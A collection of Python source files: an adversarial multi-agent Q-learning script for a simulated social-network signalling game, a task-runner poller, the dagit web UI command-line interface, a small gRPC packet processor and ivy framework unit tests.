                rows['attack_mode'].append(attack_mode)
                rows['attack'].append(under_attack)
                rows['signal'].append(env.signals[b, a])
                rows['action'].append(arec[t][a][b])
                rows['reward'].append(rews[t][a][b])
                # attacked agents receive the configured signal bias
                rows['bias'].append(env.bias_per_agent if under_attack == 1 else 0)
    frame = pd.DataFrame(rows)
    frame.sort_values(by=['batch', 't', 'agent'], inplace=True)
    frame.to_csv(save_path + fname, index=False)
def run_test(sess, log, iteration, total_time, q_agents, agents,
             env, args, save_path='', fname='', do_save=False):
    """Run one evaluation episode and summarize results per agent type.

    Returns (rewards_last_T, action_signal_correlation, accuracy), each a
    dict keyed by agent type. When do_save is True, pickles the raw results
    and optionally (args.eval_save_csv) writes a full CSV log.
    """
    def print_test_summary(rews):
        # rews: per-time-step list; each entry is a list of per-agent
        # reward arrays of length n_batches.
        rewards = []
        rewards_sd = []
        rewards_min = []
        rewards_max = []
        for rew in rews:
            rw = np.zeros((len(rew), len(rew[0])))
            for j in range(len(rew)):
                rw[j, :] = rew[j]
            rewards.append(np.mean(rw))
            rewards_sd.append(np.std(rw))
            rewards_min.append(np.min(rw))
            rewards_max.append(np.max(rw))
        mean_test_reward = np.mean(rewards)
        print('========================================')
        print('Testing at iteration %d' % iteration)
        print('Test terminal reward (%d batches) %f +- %f' %(
            args.n_batches, rewards[-1], rewards_sd[-1]))
        print('Test terminal reward (%d batches) max %f, min %f' %(
            args.n_batches, rewards_max[-1], rewards_min[-1]))
        print('Test total reward (%d batches) %f' %(
            args.n_batches, mean_test_reward))
        print('========================================')
        # mean reward at the final time step
        return rewards[-1]
    rews, arec, signals_rec, env_res = run_episode(
        sess, log, iteration, total_time, q_agents, agents, env, args,
        test=True
    )
    rewards_last_T = {}
    action_signal_correlation = {}
    accuracy = {}
    for a_type in rews:
        print('========================================')
        print('Test for type %s' % a_type)
        rT = print_test_summary(rews[a_type])
        rewards_last_T[a_type] = rT
        # correlation/accuracy use the first agent's record at t=0
        # (NOTE(review): presumably representative of the type — confirm)
        ac = arec[a_type][0][0]
        si = signals_rec[a_type][0][0]
        action_signal_correlation[a_type] = np.corrcoef(
            ac, si
        )[0, 1]
        accuracy[a_type] = (ac == env_res.world[:, 0]).mean()
    if do_save:
        if args.attack:
            fname += '_attack_mode_n_attack_%d_bias_%f'%(args.n_attack, args.bias_per_agent)
        with open(save_path + fname, 'wb') as f:
            pickle.dump([rews, arec, signals_rec], f, pickle.HIGHEST_PROTOCOL)
        if args.eval_save_csv:
            make_csv_log(rews, arec, env, save_path, fname + '_full_log.csv')
    return rewards_last_T, action_signal_correlation, accuracy
def split_by_type(l, agents, is_signal=False):
    """Group per-agent data by agent type.

    Args:
        l: per-agent container. Indexed as l[i] normally, or as the column
           l[:, i] when is_signal is True (signals are (batch, agent) arrays).
        agents: objects carrying an `a_type` attribute, in the same order as l.
        is_signal: select column indexing instead of positional indexing.

    Returns:
        dict mapping each agent type to the list of that type's entries,
        preserving agent order within each type.
    """
    grouped = {a_type: [] for a_type in {a.a_type for a in agents}}
    for position, agent in enumerate(agents):
        entry = l[:, position] if is_signal else l[position]
        grouped[agent.a_type].append(entry)
    return grouped
def run_episode(sess, log, iteration, total_time, q_agents, agents, env, args,
                test=False):
    """Play one episode of args.T steps.

    In training mode (test=False) also performs a Q-update per agent, logs
    the iteration, and returns the advanced `total_time`. In test mode
    returns (rews, arec, signals_rec, env), the first three keyed by type.

    Fix: the per-agent target Q-values (`qval_targets`) are now forwarded to
    log.log(); previously `qval_trains` was passed twice, so the logged
    target values silently duplicated the training values.
    """
    obs = env.reset()
    # bind each agent to the shared per-type q-agent for this episode
    for i, a in enumerate(agents):
        if env.attack:
            if i in env.attack_idx:
                a.reset(env.signals[:, i], q_agents['attacker'], 'attacker')
            else:
                a.reset(env.signals[:, i], q_agents['citizen'], 'citizen')
        else:
            a.reset(env.signals[:, i], q_agents['citizen'], 'citizen')
    a_types = list(set([a.a_type for a in agents]))
    def make_dict():
        d = {}
        for t in a_types:
            d[t] = []
        return d
    rews = make_dict()
    arec = make_dict()
    signals_rec = make_dict()
    for t in range(args.T):
        for i, a in enumerate(agents):
            a.observe_act(obs[i])
        actions = []
        for i, a in enumerate(agents):
            ids = [a.agent_id for j in range(args.n_batches)]
            action = a.q_agent.take_action(
                sess, a.act_obs,
                a.signal, ids, t,
                total_time, args.n_batches, test, env.world
            )
            if args.attack and args.random_attacker and a.a_type == 'attacker':
                # random attacker overrides the learned policy
                action = np.random.randint(0, args.num_actions - 1, size=args.n_batches)
            actions.append(action)
            a.record_act_taken(action)
        obs, rewards = env.step(actions)
        signals = env.signals
        rewards_split_types = split_by_type(rewards, agents)
        actions_split_types = split_by_type(actions, agents)
        signals_split_types = split_by_type(signals, agents, is_signal=True)
        for a_type in a_types:
            rews[a_type].append(rewards_split_types[a_type])
            arec[a_type].append(actions_split_types[a_type])
            signals_rec[a_type].append(signals_split_types[a_type])
        for i, a in enumerate(agents):
            # NOTE: this is not used in learning! Only for record keeping.
            a.observe_reward(rewards[i])
    if not test:
        errors = []
        grad_norms = []
        qval_trains = []
        qval_targets = []
        for i, a in enumerate(agents):
            ids = [a.agent_id for j in range(args.n_batches)]
            error, grad_norm, qval_train, qval_target = a.q_agent.update(env,
                sess, a.act_obs, a.act_taken,
                a.signal, ids, a.rewards,
                total_time, iteration, env.world
            )
            errors.append(error)
            grad_norms.append(grad_norm)
            qval_trains.append(qval_train[0])
            qval_targets.append(qval_target[0])
        log.log(agents, errors, grad_norms, qval_trains, qval_targets,
                total_time, q_agents, iteration, args)
        total_time += args.T
        return total_time
    else:
        return rews, arec, signals_rec, env
def train_or_eval(args):
    """Train from scratch, resume training, or evaluate a saved model.

    Behavior is selected by args.restore / args.evaluate. Builds the train
    and test environments, the citizen and attacker q-agents, then either
    runs the training loop (checkpointing on best citizen test reward, or
    at fixed intervals when args.save_regularly) or a single evaluation.
    """
    RESTORE = False
    EVALUATE = False
    EVALUATE_SAVE_CSV = False
    if args.restore:
        RESTORE = args.restore
        restore_file = args.restore_file
        restore_id = args.restore_run_id
        EVALUATE = args.evaluate
        n_batch_eval = args.n_batches_evaluation
        EVALUATE_SAVE_CSV = args.eval_save_csv
    if not RESTORE:
        # fresh run: mint an id and persist the arguments for later restore
        run_id = id_generator()
        log_file = args.log_path + run_id
        arg_file = args.log_path + 'args_' + run_id
        with open(arg_file, 'wb') as f:
            pickle.dump(args, f, pickle.HIGHEST_PROTOCOL)
    else:
        run_id = restore_id
        log_file = args.log_path + run_id +'_tmp'
        arg_file = args.log_path + 'args_' + run_id
    # stash CLI overrides before the pickled args object replaces `args`
    ATTACK = args.attack
    N_ATTACK = args.n_attack
    BIAS_PER_AGENT = args.bias_per_agent
    EVAL_SAVE_PATH = args.eval_path
    SAVE_PATH = args.save_path
    LOG_PATH = args.log_path
    # reload the persisted args (for fresh runs this re-reads what was just
    # written), then re-apply the stashed overrides
    with open(arg_file, 'rb') as f:
        args = pickle.load(f)
    if ATTACK:
        print('Setting attack parameters!')
        args.attack = ATTACK
        args.n_attack = N_ATTACK
        args.bias_per_agent = BIAS_PER_AGENT
    else:
        args.attack = ATTACK
    args.eval_save_csv = EVALUATE_SAVE_CSV
    args.eval_path = EVAL_SAVE_PATH
    args.save_path = SAVE_PATH
    args.log_path = LOG_PATH
    args.network_path = osp.join(
        osp.abspath(osp.join('../..')),
        args.network_path)
    print(args.network_file)
    args.save_path = osp.join(
        args.save_path, run_id)
    if not os.path.exists(args.save_path):
        os.makedirs(args.save_path)
    env = envim.env_adv(args)
    # the test env uses a larger batch size than training
    args_test = deepcopy(args)
    if not EVALUATE:
        args_test.n_batches = args_test.n_batches_test
    else:
        args_test.n_batches = n_batch_eval
    env_test = envim.env_adv(args_test)
    log = logger(args.average_window, args.print_every, log_file, ['citizen', 'attacker'])
    sess = get_session()
    set_global_seeds(args.seed)
    if args.optimizer == 'RMSProp':
        my_optimizer = RMSPropOptimizer(learning_rate=args.learning_rate,
                                        momentum=args.momentum)
    elif args.optimizer == 'Adam':
        my_optimizer = AdamOptimizer(learning_rate=args.learning_rate)
    else:
        raise ValueError(
            'Must provide a valid optimizer.'
        )
    if args.exploration_schedule == 'constant':
        my_exploration_schedule = constant_exploration_schedule(
            constant_rate=args.exploration_rate)
    elif args.exploration_schedule == 'piece_wise_linear':
        my_exploration_schedule = piecewise_exploration_schedule(900000,
                                                                 limit_rate=args.exploration_rate)
    else:
        raise ValueError(
            'Must provide a valid exploration schedule.'
        )
    # separate q-networks for citizens and attackers
    q_agents = {}
    q_agents['citizen'] = qa.q_agent(
        args.num_actions, args.n_agents, args.T, args.gamma,
        my_optimizer,
        my_exploration_schedule,
        args.target_reset,
        args.n_hidden,
        'q_func_train_citizen',
        'q_func_target_citizen',
        grad_norm_clipping=args.grad_norm_clipping, reuse=False, double_q=args.double_q,
        n_layers=args.n_layers)
    q_agents['attacker'] = qa.q_agent(
        args.num_actions, args.n_agents, args.T, args.gamma,
        my_optimizer,
        my_exploration_schedule,
        args.target_reset,
        args.n_hidden,
        'q_func_train_attack',
        'q_func_target_attack',
        grad_norm_clipping=args.grad_norm_clipping, reuse=False, double_q=args.double_q,
        n_layers=args.n_layers)
    global_step = tf.Variable(0, dtype=tf.int32, trainable=False, name='global_step')
    saver = tf.train.Saver(max_to_keep=args.max_to_keep)
    agents = []
    for i in range(args.n_agents):
        agents.append(agent_data.agent_data(i))
    sess.run(tf.initializers.global_variables())
    # running top-k citizen test rewards used as the checkpointing criterion
    best_n_rewards = [0]
    if RESTORE:
        restore_path = osp.join(args.save_path, restore_file)
        saver.restore(sess, restore_path)
    if not EVALUATE:
        total_time = 0
        for it in range(args.n_iterations):
            total_time = run_episode(
                sess, log, it, total_time, q_agents, agents, env, args
            )
            sess.run(global_step.assign_add(1))
            if not args.save_regularly:
                # checkpoint whenever the citizen test reward enters the top-k
                if (it + 1) % 100 == 0:
                    test_reward, action_signal_correlation, accuracy = run_test(
                        sess, log, it, total_time, q_agents, agents,
                        env_test, args_test
                    )
                    log.test_log(test_reward, action_signal_correlation, accuracy)
                    if test_reward['citizen'] > np.min(best_n_rewards):
                        if len(best_n_rewards) < args.max_to_keep:
                            best_n_rewards.append(test_reward['citizen'])
                        else:
                            min_r = np.min(best_n_rewards)
                            best_n_rewards = [x for x in best_n_rewards if x != min_r]
                            best_n_rewards.append(test_reward['citizen'])
                        saver.save(sess,
                                   osp.join(args.save_path, run_id + '_sess_chkpt_best_reward_%f'%test_reward['citizen']),
                                   global_step=global_step)
                        print('Current best reward = %s' % best_n_rewards)
            else:
                # fixed-interval testing and checkpointing
                if (it + 1) % args.test_freq == 0:
                    test_reward, action_signal_correlation, accuracy = run_test(
                        sess, log, it, total_time, q_agents, agents,
                        env_test, args_test
                    )
                    log.test_log(test_reward, action_signal_correlation, accuracy)
                if (it + 1) % args.checkpt_freq == 0:
                    saver.save(sess,
                               osp.join(args.save_path, run_id + '_sess_chkpt_iteration_%d'%it),
                               global_step=global_step)
    else:
        eval_save_path = args.eval_path
        fname = run_id + '_eval'
        test_reward, _, _ = run_test(
            sess, log, 0, 0, q_agents, agents,
            env_test, args_test, save_path=eval_save_path,
            fname=fname, do_save=True
        )
        for a_type in test_reward:
            print('evaluating, type %s, reward = %f' % (a_type, test_reward[a_type]))
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    # NETWORK ARCHITECTURE PARAMETERS
    parser.add_argument('-n_hidden', help='GRU and fully connected hidden units', type=int, default=64)
    parser.add_argument('-n_layers', help='number of GRU layers', type=int, default=2)
    # LEARNING PARAMETERS
    parser.add_argument('-seed', help='global seed', type=int, default=5)
    parser.add_argument('-learning_rate', help='learning rate', type=float, default=5e-4)
    parser.add_argument('-momentum', help='momentum for RMSProp', type=float, default=0.05)
    parser.add_argument('-optimizer', help='which optimizer to use', type=str, default='RMSProp')
    parser.add_argument('-exploration_rate', help='exploration rate', type=float, default=0.05)
    parser.add_argument('-exploration_schedule', help='exploration schedule to use',
                        type=str, default='constant')
    parser.add_argument('-grad_norm_clipping', help='max gradient norm to clip to', type=float, default=10.)
    parser.add_argument('-target_reset', help='dqn reset frequency', type=int, default=100)
    parser.add_argument('-n_iterations', help='number of training episodes', type=int, default=12000)
    parser.add_argument('-n_batches', help='number of batches', type=int, default=256)
    parser.add_argument('-n_batches_test', help='number of batches for testing during training',
                        type=int, default=2000)
    parser.add_argument('-n_batches_evaluation',
                        help='number of batches for testing during evaluation post traing',type=int, default=10000)
    parser.add_argument('-double_q', help='do doubel q learning', action="store_true")
    parser.add_argument('-n_experiments', help='number of experiments to run in parallel', type=int, default=1)
    # GAME PARAMETERS
    parser.add_argument('-num_actions', help='number of actions', type=int, default=2)
    parser.add_argument('-n_states', help='number of states', type=int, default=2)
    parser.add_argument('-n_agents', help='number of agents', type=int, default=10)
    parser.add_argument('-var', help='variance of signal', type=float, default=1.)
    parser.add_argument('-T', help='number of time steps', type=int, default=10)
    parser.add_argument('-gamma', help='discount factor', type=float, default=0.99)
    parser.add_argument('-network_path', help='location of network file', default='social_network_files/')
    parser.add_argument('-network_file', help='network file', default='social_network_complete.txt')
    parser.add_argument('-attack', help='whether to run in attack mode', action="store_true")
    parser.add_argument('-n_attack', help='number of nodes to attack', type=int, default=1)
    parser.add_argument('-bias_per_agent', help='attack bias per agent', type=float, default=3.)
    parser.add_argument('-random_attacker', help='if random attacker should be used instead of trained attacker', action="store_true")
    # LOGGING PARAMTERS
    parser.add_argument('-print_every', help='reward printing interval', type=int, default=100)
    parser.add_argument('-average_window', help='reward averaging interval', type=int, default=100)
    parser.add_argument('-log_path', help='location of log file', default='log/')
    parser.add_argument('-save_path', help='location of model checkpoints', default='checkpoints/')
    parser.add_argument('-max_to_keep', help='number of models to save', type=int, default=5)
    parser.add_argument('-code_version', help='git version of code', default='no_version')
    parser.add_argument('-experiment_name', help='name of experiment for easy identification', default='no_name')
    parser.add_argument('-save_regularly', help='whether to save model checkpoints at regular intervals', action='store_true')
    parser.add_argument('-checkpt_freq', help='frequency of model checkpoints under regular saving', type=int, default=100)
    parser.add_argument('-test_freq', help='frequency to run test', type=int, default=5)
    # RESTORE AND EVALUATE PARAMETERS
    parser.add_argument('-restore', help='restore best saved model', action="store_true")
    parser.add_argument('-restore_run_id', help='id of run to restore', type=str, default='')
    parser.add_argument('-restore_file', help='file of run to restore', type=str, default='')
    parser.add_argument('-evaluate', help='evaluate a saved model', action="store_true")
    parser.add_argument('-eval_path', help='location of evaluation output', default='evaluation/')
    parser.add_argument('-eval_save_csv', help='save evaluated model output as csv', action="store_true")
    parser.add_argument('-time_stamp', help='time stamp to recover', default='no_time_stamp')
    parser.add_argument('-load_old_format', help='load files in old folder structure', action="store_true")
    args = parser.parse_args()
    # add code version number (falls back to '0' outside a git checkout)
    try:
        repo = git.Repo(search_parent_directories=True)
        args.code_version = repo.head.object.hexsha
    except:
        args.code_version = '0'
    print('===================================================')
    print('USING PARAMETERS')
    print(args)
    print('===================================================')
    if not args.evaluate:
        if not args.restore:
            # fresh training run: timestamped results directory
            exp_path = args.experiment_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
            args.save_path = osp.join(
                osp.abspath(osp.join('../..')), 'results', exp_path,
                args.save_path)
            args.log_path = osp.join(
                osp.abspath(osp.join('../..')), 'results', exp_path,
                args.log_path)
            if not os.path.exists(args.log_path):
                os.makedirs(args.log_path)
            if not os.path.exists(args.save_path):
                os.makedirs(args.save_path)
        processes = []
        # leave one core free; never drop below one experiment
        args.n_experiments = min(args.n_experiments, max(mult.cpu_count() - 1, 1))
        print('Running a total of %d experiments in parallel.' % args.n_experiments)
        for e in range(args.n_experiments):
            seed = args.seed + 10*e
            args_run = deepcopy(args)
            args_run.seed = seed
            print('Running experiment with seed %d'%seed)
            # NOTE(review): `train_func` closes over the loop-local
            # `args_run`. This relies on the fork start method (each child
            # is started before the next rebinding); under the spawn start
            # method a nested function cannot be pickled at all. Prefer
            # Process(target=train_or_eval, args=(args_run,)) — confirm.
            def train_func():
                train_or_eval(args_run)
            p = Process(target=train_func, args=tuple())
            p.start()
            processes.append(p)
        for p in processes:
            p.join()
    else:
        if not args.load_old_format:
            exp_path = args.experiment_name
            args.save_path = osp.join(
                osp.abspath(osp.join('../..')), 'results', exp_path,
                args.save_path)
            args.log_path = osp.join(
                osp.abspath(osp.join('../..')), 'results', exp_path,
                args.log_path)
            args.eval_path = osp.join(
                osp.abspath(osp.join('../..')), 'results', exp_path,
                args.eval_path)
            if not os.path.exists(args.eval_path):
                os.makedirs(args.eval_path)
        else:
            # legacy layout: results live directly under the repo root
            args.save_path = osp.join(
                osp.abspath(osp.join('../..')),
                args.save_path)
            args.log_path = osp.join(
                osp.abspath(osp.join('../..')),
                args.log_path)
            args.eval_path = osp.join(
                osp.abspath(osp.join('../..')),
                args.eval_path)
            if not os.path.exists(args.eval_path):
                os.makedirs(args.eval_path)
        train_or_eval(args)
|
__init__.py | import time
import importlib
import traceback
from threading import Thread
import task.services.task as task
from task.services.TaskLog import *
from config import *
def monitor_infinite():
    """Poll for runnable tasks forever, sleeping 5s between sweeps."""
    print("Starting Task Runner ...")
    while True:
        monitor_once()
        time.sleep(5)  # loop every 5s
def monitor_once():
    """Run one polling sweep: trigger scheduled tasks, then start a worker
    thread for every instance waiting on this host."""
    import socket
    hostname = socket.gethostname()
    # trigger schedule tasks
    task.trigger_scheduled_tasks()
    # instances waiting to run on this host
    instances = list(task.waiting_tasks(hostname))
    for instance in instances:
        print("[{}] * New task found [{}]: {}".format(
            now(), instance['id'], instance['task']['name'])
        )
        worker = Thread(target=run_task, args=(instance,))
        worker.start()
# Run Task - this should be thread
def run_task(instance):
task_successful = True
# Set instance "RUNNING"
task.status(instance, "RUNNING")
# set instance started time
task.started(instance)
# Get List of action
actions = task.actions(instance['task_id'])
for action in actions:
print("[{}] Action: {}".format(now(), action['name']))
log = TaskLog(HOST, task, instance, action)
# prepare parameters
p = {
'instance': instance,
'action': action,
'log': log
}
# run task
task_module_path = "task.modules.{}".format(action['module']['name'])
module = importlib.import_module(task_module_path)
try:
task_successful = module.run(p)
if not task_successful and action['stop'] != "No":
log.info("stopped - {}".format(action['name']))
break
except Exception, e:
print(e.message)
print(traceback.format_exc())
log.error("action failed: {}".format(action['name']), e)
# Set instance "RUNNING"
if task_successful:
task.status(instance, "COMPLETED")
else:
task.status(instance, "ERROR")
# set instance finished time
task.finished(instance)
def now():
    """Return the current local time formatted as 'YYYY-MM-DD HH:MM:SS'."""
    return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
|
cli.py | import os
import sys
import tempfile
import threading
from contextlib import contextmanager
import click
import six
from dagster import check
from dagster.cli.workspace import Workspace, get_workspace_from_kwargs, workspace_target_argument
from dagster.cli.workspace.cli_target import WORKSPACE_TARGET_WARNING
from dagster.core.instance import DagsterInstance
from dagster.core.telemetry import (
START_DAGIT_WEBSERVER,
log_action,
log_workspace_stats,
upload_logs,
)
from dagster.utils import DEFAULT_WORKSPACE_YAML_FILENAME
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler
from .app import create_app_from_workspace
from .version import __version__
def create_dagit_cli():
    """Return the `ui` click command as the dagit CLI entry point."""
    return ui  # pylint: disable=no-value-for-parameter
# Defaults for the dagit webserver; port/timeout can be overridden via CLI.
DEFAULT_DAGIT_HOST = "127.0.0.1"
DEFAULT_DAGIT_PORT = 3000
DEFAULT_DB_STATEMENT_TIMEOUT = 5000  # 5 sec
@click.command(
    name="ui",
    help=(
        "Run dagit. Loads a repository or pipeline.\n\n{warning}".format(
            warning=WORKSPACE_TARGET_WARNING
        )
        + (
            "\n\nExamples:"
            "\n\n1. dagit (works if .{default_filename} exists)"
            "\n\n2. dagit -w path/to/{default_filename}"
            "\n\n3. dagit -f path/to/file.py"
            "\n\n4. dagit -f path/to/file.py -d path/to/working_directory"
            "\n\n5. dagit -m some_module"
            "\n\n6. dagit -f path/to/file.py -a define_repo"
            "\n\n7. dagit -m some_module -a define_repo"
            "\n\n8. dagit -p 3333"
            "\n\nOptions can also provide arguments via environment variables prefixed with DAGIT"
            "\n\nFor example, DAGIT_PORT=3333 dagit"
        ).format(default_filename=DEFAULT_WORKSPACE_YAML_FILENAME)
    ),
)
@workspace_target_argument
@click.option(
    "--host",
    "-h",
    type=click.STRING,
    default=DEFAULT_DAGIT_HOST,
    help="Host to run server on",
    show_default=True,
)
@click.option(
    "--port",
    "-p",
    type=click.INT,
    help="Port to run server on, default is {default_port}".format(default_port=DEFAULT_DAGIT_PORT),
)
@click.option(
    "--path-prefix",
    "-l",
    type=click.STRING,
    default="",
    help="The path prefix where Dagit will be hosted (eg: /dagit)",
    show_default=True,
)
@click.option(
    "--storage-fallback",
    help="Base directory for dagster storage if $DAGSTER_HOME is not set",
    default=None,
    type=click.Path(),
)
@click.option(
    "--db-statement-timeout",
    help="The timeout in milliseconds to set on database statements sent "
    "to the DagsterInstance. Not respected in all configurations.",
    default=DEFAULT_DB_STATEMENT_TIMEOUT,
    type=click.INT,
    show_default=True,
)
@click.version_option(version=__version__, prog_name="dagit")
def ui(host, port, path_prefix, storage_fallback, db_statement_timeout, **kwargs):
    """Click entry point: resolve port/storage defaults, then hand off to
    host_dagit_ui. Extra kwargs are workspace-target options."""
    # add the path for the cwd so imports in dynamically loaded code work correctly
    sys.path.append(os.getcwd())
    if port is None:
        # no explicit port: flag host_dagit_ui to fall back to another port
        # if the default is taken (lookup logic lives downstream)
        port_lookup = True
        port = DEFAULT_DAGIT_PORT
    else:
        port_lookup = False
    if storage_fallback is None:
        # ephemeral storage dir; removed when the server exits this block
        with tempfile.TemporaryDirectory() as storage_fallback:
            host_dagit_ui(
                host,
                port,
                path_prefix,
                storage_fallback,
                db_statement_timeout,
                port_lookup,
                **kwargs,
            )
    else:
        host_dagit_ui(
            host, port, path_prefix, storage_fallback, db_statement_timeout, port_lookup, **kwargs
        )
def host_dagit_ui(
    host, port, path_prefix, storage_fallback, db_statement_timeout, port_lookup=True, **kwargs
):
    """Resolve the Dagster instance and workspace from CLI kwargs, then serve dagit."""
    with DagsterInstance.get(storage_fallback) as instance:
        # let instance components adapt to running inside a long-lived server process
        instance.optimize_for_dagit(db_statement_timeout)
        with get_workspace_from_kwargs(kwargs) as workspace:
            if workspace:
                host_dagit_ui_with_workspace(
                    instance, workspace, host, port, path_prefix, port_lookup
                )
            else:
                raise Exception("Unable to load workspace with cli_args: {}".format(kwargs))
def host_dagit_ui_with_workspace(instance, workspace, host, port, path_prefix, port_lookup=True):
    """Validate inputs, record workspace telemetry, build the app, and start serving."""
    # fail fast on wrong argument types before any side effects happen
    check.inst_param(instance, "instance", DagsterInstance)
    check.inst_param(workspace, "workspace", Workspace)
    log_workspace_stats(instance, workspace)
    wsgi_app = create_app_from_workspace(workspace, instance, path_prefix)
    start_server(instance, host, port, path_prefix, wsgi_app, port_lookup)
@contextmanager
def uploading_logging_thread():
    """Run the telemetry log-upload thread for the duration of the context.

    Starts a named thread running ``upload_logs(stop_event)`` on entry; on
    exit (normal or exceptional) signals the event and joins the thread so
    it cannot outlive the server.
    """
    stop_event = threading.Event()
    logging_thread = threading.Thread(
        # the single positional argument is passed as a 1-tuple (the original
        # `args=([stop_event])` built a list wrapped in redundant parens)
        target=upload_logs, args=(stop_event,), name="telemetry-upload"
    )
    try:
        logging_thread.start()
        yield
    finally:
        # signal the uploader to stop, then wait for it to exit
        stop_event.set()
        logging_thread.join()
def start_server(instance, host, port, path_prefix, app, port_lookup, port_lookup_attempts=0):
    """Serve the dagit WSGI app, retrying on successive ports if the port is taken.

    Args:
        instance: DagsterInstance used for telemetry logging.
        host/port/path_prefix: where the server is exposed.
        app: the WSGI application to serve.
        port_lookup (bool): if True, probe ``port + n`` when ``port`` is in use
            (after confirming with the user on the first conflict).
        port_lookup_attempts (int): recursion counter for how many ports were tried.
    """
    server = pywsgi.WSGIServer((host, port), app, handler_class=WebSocketHandler)
    print(  # pylint: disable=print-call
        "Serving on http://{host}:{port}{path_prefix} in process {pid}".format(
            host=host, port=port, path_prefix=path_prefix, pid=os.getpid()
        )
    )
    log_action(instance, START_DAGIT_WEBSERVER)
    with uploading_logging_thread():
        try:
            server.serve_forever()
        except OSError as os_error:
            if "Address already in use" in str(os_error):
                if port_lookup and (
                    port_lookup_attempts > 0
                    or click.confirm(
                        (
                            "Another process on your machine is already listening on port {port}. "
                            "Would you like to run the app at another port instead?"
                        ).format(port=port)
                    )
                ):
                    port_lookup_attempts += 1
                    start_server(
                        instance,
                        host,
                        port + port_lookup_attempts,
                        path_prefix,
                        app,
                        True,
                        port_lookup_attempts,
                    )
                else:
                    # native py3 exception chaining (this codebase already relies on
                    # py3-only constructs, e.g. tempfile.TemporaryDirectory as a CM),
                    # so six.raise_from is unnecessary
                    raise Exception(
                        (
                            "Another process on your machine is already listening on port {port}. "
                            "It is possible that you have another instance of dagit "
                            "running somewhere using the same port. Or it could be another "
                            "random process. Either kill that process or use the -p option to "
                            "select another port."
                        ).format(port=port)
                    ) from os_error
            else:
                # re-raise unchanged, preserving the original traceback
                raise
# module-level command object consumed by the console-script entry point
cli = create_dagit_cli()
def main():
    """Console-script entry point: run the dagit CLI with DAGIT_* env-var support."""
    # click magic: click fills in argv and env-var-derived options at call time
    cli(auto_envvar_prefix="DAGIT")  # pylint:disable=E1120
|
samplepacketprocessor.py | import grpc
import EventNotificationProto_pb2
import ServicesProto_pb2_grpc
import threading
from ryu.lib.packet import packet
import array
# A Simple packet processor.
def packetprocessor():
    """Register with a local gRPC event-notification service and watch for packets.

    Connects to localhost:50051, registers this client, subscribes to the
    event stream for topic type 0, and prints a message when a received
    packet parses as IPv4.
    """
    channel = grpc.insecure_channel('localhost:50051')
    eventNotificationStub = ServicesProto_pb2_grpc.EventNotificationStub(channel)
    request = EventNotificationProto_pb2.RegistrationRequest(clientId = "packet_processor_python")
    topic = EventNotificationProto_pb2.Topic(clientId = "packet_processor_python"
    , type = 0)
    # Register to PACKET_EVENT
    response = eventNotificationStub.register(request)
    # server-streaming call: iterating blocks until events arrive
    eventObserver = eventNotificationStub.onEvent(topic)
    for event in eventObserver:
        pktContext = event.packetContext
        # NOTE(review): protobuf message fields are never None, so this guard
        # likely never fires — presumably HasField('packetContext') was intended; verify
        if pktContext is None:
            return
        inboundPkt = pktContext.inboundPacket
        # parse the raw bytes with Ryu's packet library
        pkt = packet.Packet(inboundPkt.data)
        for p in pkt:
            # Ryu yields str for unparsed trailing payload; skip those
            if type(p)!= str:
                if p.protocol_name == "ipv4":
                    print("An IPv4 packet has been received")
                    # NOTE(review): busy-wait spins this thread forever after the
                    # first IPv4 packet — looks like debug/demo code; confirm intent
                    while True:
                        continue
if __name__ == '__main__':
    # run the packet processor on a background worker thread
    worker = threading.Thread(target=packetprocessor)
    worker.start()
|
test_general.py | """
Collection of tests for unified general functions
"""
# global
import os
import math
import time
import einops
import pytest
import threading
import numpy as np
from numbers import Number
from collections.abc import Sequence
import torch.multiprocessing as multiprocessing
# local
import ivy
import ivy.functional.backends.numpy
import ivy.functional.backends.jax
import ivy.functional.backends.tensorflow
import ivy.functional.backends.torch
import ivy.functional.backends.mxnet
import ivy_tests.test_ivy.helpers as helpers
# Helpers #
# --------#
def _get_shape_of_list(lst, shape=()):
if not lst:
return []
if not isinstance(lst, Sequence):
return shape
if isinstance(lst[0], Sequence):
l = len(lst[0])
if not all(len(item) == l for item in lst):
msg = 'not all lists have the same length'
raise ValueError(msg)
shape += (len(lst),)
shape = _get_shape_of_list(lst[0], shape)
return shape
# Tests #
# ------#
# set_framework
@pytest.mark.parametrize(
    "fw_str", ['numpy', 'jax', 'torch', 'mxnet'])
def test_set_framework(fw_str, dev, call):
    """Each backend can be set as the active framework and unset again."""
    ivy.set_framework(fw_str)
    ivy.unset_framework()
# use_framework
def test_use_within_use_framework(dev, call):
    """Every backend's ``use`` context manager can be entered and exited cleanly."""
    backends = (
        ivy.functional.backends.numpy,
        ivy.functional.backends.jax,
        ivy.functional.backends.tensorflow,
        ivy.functional.backends.torch,
        ivy.functional.backends.mxnet,
    )
    for backend in backends:
        with backend.use:
            pass
@pytest.mark.parametrize(
    "allow_duplicates", [True, False])
def test_match_kwargs(allow_duplicates):
    """ivy.match_kwargs routes a kwargs dict to each receiver's own parameters."""

    def func_a(a, b, c=2):
        pass

    func_b = lambda a, d, e=5: None

    class ClassA:
        def __init__(self, c, f, g=3):
            pass

    kwargs = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6}
    kwfa, kwfb, kwca = ivy.match_kwargs(
        kwargs, func_a, func_b, ClassA, allow_duplicates=allow_duplicates)
    # func_a is first, so it always claims its full parameter set
    assert kwfa == {'a': 0, 'b': 1, 'c': 2}
    if allow_duplicates:
        # later receivers may repeat keys already claimed earlier
        assert kwfb == {'a': 0, 'd': 3, 'e': 4}
        assert kwca == {'c': 2, 'f': 5, 'g': 6}
    else:
        # keys claimed by an earlier receiver are withheld from later ones
        assert kwfb == {'d': 3, 'e': 4}
        assert kwca == {'f': 5, 'g': 6}
# def test_get_referrers_recursive(dev, call):
#
# class SomeClass:
# def __init__(self):
# self.x = [1, 2]
# self.y = [self.x]
#
# some_obj = SomeClass()
# refs = ivy.get_referrers_recursive(some_obj.x)
# ref_keys = refs.keys()
# assert len(ref_keys) == 3
# assert 'repr' in ref_keys
# assert refs['repr'] == '[1,2]'
# y_id = str(id(some_obj.y))
# y_refs = refs[y_id]
# assert y_refs['repr'] == '[[1,2]]'
# some_obj_dict_id = str(id(some_obj.__dict__))
# assert y_refs[some_obj_dict_id] == 'tracked'
# dict_refs = refs[some_obj_dict_id]
# assert dict_refs['repr'] == "{'x':[1,2],'y':[[1,2]]}"
